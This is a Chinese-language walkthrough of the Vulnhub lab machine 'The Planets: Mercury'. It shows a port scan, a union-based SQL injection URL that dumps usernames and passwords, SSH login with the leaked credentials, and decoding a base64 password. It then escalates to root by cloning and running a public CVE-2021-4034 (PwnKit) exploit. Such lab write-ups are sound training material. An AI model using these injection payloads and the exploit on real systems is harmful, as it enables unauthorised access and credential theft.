THE PLANETS:MECURY

准备

攻击机: kali
靶机: THE PLANETS:MECURY NAT 192.168.91.0 网段
下载连接:
https://www.vulnhub.com/entry/the-planets-mercury,544/
测试发现无法正常获取IP,因此进入拯救模式修改网卡配置文件。
开机长按 shift 显示如下画面:

在当前画面按 e

如图所示,将 ro quiet 跟改为 : rw signie init=/bin/bash

然后按 ctrl + x 进入系统进入系统,输入: lsb_release -a 系统发行版本
如图所示为 Ununtu 20.0.4, 众所周知,Ubunut 新版本中修改IP地址配置文件为 /etc/netplan/*** (*** 根据实际情况文件名称是什么就是什么)先查看网卡名称

为 ens33,现在修改配置文件
vi /etc/netplan/00-installer-config.yaml

如图所示将 原本错误的网卡名称跟改为 ens33, 这里已经修改完成。现在只需重启linux 正常启动即可。

信息搜集与利用

主机发现


如图所示得到了目标靶机的IP地址: 192.168.91.172

端口扫描

nmap -sV -p- -A -sS 192.168.91.172 -oN nmap_mercury.txt

Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-09 17:05 CST
Nmap scan report for 192.168.91.172
Host is up (0.00092s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c8:24:ea:2a:2b:f1:3c:fa:16:94:65:bd:c7:9b:6c:29 (RSA)
|   256 e8:08:a1:8e:7d:5a:bc:5c:66:16:48:24:57:0d:fa:b8 (ECDSA)
|_  256 2f:18:7e:10:54:f7:b9:17:a2:11:1d:8f:b3:30:a5:2a (ED25519)
8080/tcp open  http-proxy WSGIServer/0.2 CPython/3.8.2
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 404 Not Found
|     Date: Wed, 09 Feb 2022 09:04:57 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html
|     X-Frame-Options: DENY
|     Content-Length: 2366
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta http-equiv="content-type" content="text/html; charset=utf-8">
|     <title>Page not found at /nice ports,/Trinity.txt.bak</title>
|     <meta name="robots" content="NONE,NOARCHIVE">
|     <style type="text/css">
|     html * { padding:0; margin:0; }
|     body * { padding:10px 20px; }
|     body * * { padding:0; }
|     body { font:small sans-serif; background:#eee; color:#000; }
|     body>div { border-bottom:1px solid #ddd; }
|     font-weight:normal; margin-bottom:.4em; }
|     span { font-size:60%; color:#666; font-weight:normal; }
|     table { border:none; border-collapse: collapse; width:100%; }
|     vertical-align:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Wed, 09 Feb 2022 09:04:57 GMT
|     Server: WSGIServer/0.2 CPython/3.8.2
|     Content-Type: text/html; charset=utf-8
|     X-Frame-Options: DENY
|     Content-Length: 69
|     X-Content-Type-Options: nosniff
|     Referrer-Policy: same-origin
|     Hello. This site is currently in development please check back later.
|   RTSPRequest:
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: WSGIServer/0.2 CPython/3.8.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

仔细查看扫描结果,只开放了 22,8080两个端口,其中 8080 为 python 3.8构成的页面。
http://192.168.91.172:8080/

尝试是否开启了 DEBUG,随便构造一个错误的url即可

如图所示可以断定为 Django 开发的网页,存在的 路由有: robots.txt ,mercuryfacts/, 访问它们,同时扫一下目录

目录扫描

dirb http://192.168.91.172:8080/
默认只能扫描出 robots.txt 然而 robots.txt协议什么都没有
访问:
http://192.168.91.172:8080/mercuryfacts/

如图所示显示出了 水星?
进入 Load a fact 页面显示如下
http://192.168.91.172:8080/mercuryfacts/1/

如图所示,注意数字1,经过测试1-8可以显示内容,猜测存在sql注入,验证:
http://192.168.91.172:8080/mercuryfacts/1’/

如上报错,则证明sql 注入存在。经过测试得到如下内容:
http://192.168.91.172:8080/mercuryfacts/44%20union%20select%20group_concat(username,0x2d,password)%20from%20users/


得到了几个用户名和密码。那么尝试能否 ssh 登陆。
经测试发现最后一个用户 webmaster-mercuryisthesizeof0.056Earths ssh 登陆成功

信息搜集

如图所示:在当前目录下存在第一个flag
cat /etc/passwd | grep "/bin.bash"
如图所示:除了 root 用户外,另有三个用户具有 /bin/bash 分别是: mercury,webmaster(当前登陆用户),linuxmaster。

flag 1


[user_flag_8339915c9a454657bd60ee58776f4ccd]

根据老套路,最后一个 flag 一般在 root 目录下,因此需要提权
在 mercury_proj/notes.txt 有如下内容

如图所示很明显:linuxmaster 为之后要切换的用户,其密码为 base64编码 bWVyY3VyeW1lYW5kaWFtZXRlcmlzNDg4MGttCg== 将其解码得到:
mercurymeandiameteris4880km

因此得到用户名和密码: linuxmaster:mercurymeandiameteris4880km

切换用户到 linuxmaster

如图所示切换成功。

SUID提取

find / -perm -u=s -type f 2>/dev/null

经过搜索发现 最后一个即红框中的内容存在提权漏洞,而且是去年才曝光的漏洞:
CVE-2021-4034
git clone https://github.com/berdav/CVE-2021-4034

进入 CVE-2021-4034 文件夹然后执行 make 命令

将生成 cve-2021-4034 可执行文件,直接运行即可
./cve-2021-4034

如图所示成功提权,拿到 root 权限,现在找root 目录下的 flag即可

如图所示拿到了 flag, 这个系列靶机挺有意思的。

总结:

  1. sql 注入
  2. cve-2021-4034

vulnhub靶场——THE PLANETS: MERCURY相关推荐

  1. vulnhub靶场——THE PLANETS:EARTH

    THE PLANETS:EARTH 准备 攻击机: kali 靶机: THE PLANETS:EARTH NAT 192.168.91.0 网段 下载连接 [https://www.vulnhub.c ...

  2. 看完这篇 教你玩转渗透测试靶机Vulnhub——The Planets:Mercury

    Vulnhub靶机The Planets:Mercury渗透测试详解 Vulnhub靶机介绍: Vulnhub靶机下载: Vulnhub靶机安装: Vulnhub靶机漏洞详解: ①:信息收集: ②:漏 ...

  3. vulnhub-The Planets: Mercury

    The Planets: Mercury ~ VulnHub 靶机: 攻击机: Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 ( ...

  4. 靶场练习第一天~vulnhub靶场之Me-and-My-Girlfriend-1

    兄弟们第一天打vulnhub靶场,我kali连靶场ip都扫不到,泪奔了,不说了开整 注意: vm虚拟机里面的编辑下面的虚拟机网络编辑器,把除了NAT模式外的模式,其他模式不启动. 至于为什么要这样操作 ...

  5. VulnHub靶场系列:Flick

    VulnHub靶场系列:Flick 今天意外看到一个VulnHub上的一个靶场的WriteUp,觉得挺有意思,所以自己试着做一遍并记录下来. 环境部署: 下载靶场并导入到VMware中: https: ...

  6. Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权)

    Vulnhub靶场渗透测试系列bulldog(命令注入和sudo提权) 靶机地址:https://www.vulnhub.com/entry/bulldog-1%2C211/ 下载将其导入VMware ...

  7. vulnhub靶场,bulldog1

    vulnhub靶场,bulldog1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/bulldog-1,211/ 攻击机:kali(192.168.109.128 ...

  8. vulnhub靶场,Monitoring

    vulnhub靶场,Monitoring 环境准备 靶机下载地址:https://www.vulnhub.com/entry/monitoring-1,555/ 攻击机:kali(192.168.10 ...

  9. vulnhub靶场{GoldenEye-v1靶场实战}

    远赴人间今鸿雁.一睹人间盛世言. GoldenEye-v1 环境: vulnhub靶场链接: https://www.vulnhub.com/entry/goldeneye-1,240/ kali主机 ...

最新文章

  1. Node.js中模块加载机制
  2. get_children 方法里面参数 iv_as_copy 有什么用?
  3. eclipse安卓工程的构建、配置连接模拟器、安卓工程结构介绍
  4. 面向.NET开发人员的Dapr——服务调用
  5. “前端+应用”两大监控利器商业化首发 ARMS领跑APM市场
  6. Read the Docs 文档管理
  7. OPencv 灰度直方图、直方图规定化
  8. 斐波那契堆的C++实现
  9. 人脸识别权威评测和人脸识别技术现状
  10. Js逆向教程-05明确js逆向的目标
  11. CodeQL代码安全扫描工具安装部署
  12. 机器学习不是你想用,想用就能用
  13. 华硕k43tk拆机清灰教程
  14. HTML5教程书籍电子版30本合集
  15. 扫雷游戏(保姆式教程)
  16. 电脑休眠后无法唤醒怎么办?
  17. 计算机操作系统——银行家算法
  18. 【SSH项目实战】国税协同平台-1.项目介绍
  19. 服务器怎么连接?服务器远程连接图文教程Windows如何远程连接服务器?Linux服务器如何远程登录?远程连接服务器命令
  20. 和石侃博士关于“香山”的一小时讨论

热门文章

  1. DBeaver连接phoenix
  2. ActivityNet Dense Event Captioning Results
  3. 【Swin Transformer】Win10使用Swin Transformer做目标检测 (使用自己的数据集 + 图解超详细)
  4. Windows实现流媒体服务器搭建 ngnix+rtmp+ffmpg+hls实现播放rtmp和HLS/m3u8直播流
  5. The interface from sap and srm
  6. GameFramework框架详解之 Resource资源管理器
  7. Java 中阿拉伯数字转大写
  8. Layui的行内数据的获取
  9. 香港Paypal申请指南
  10. oracle中isnumeric,详细讲解Oracle中isnumeric的三种实现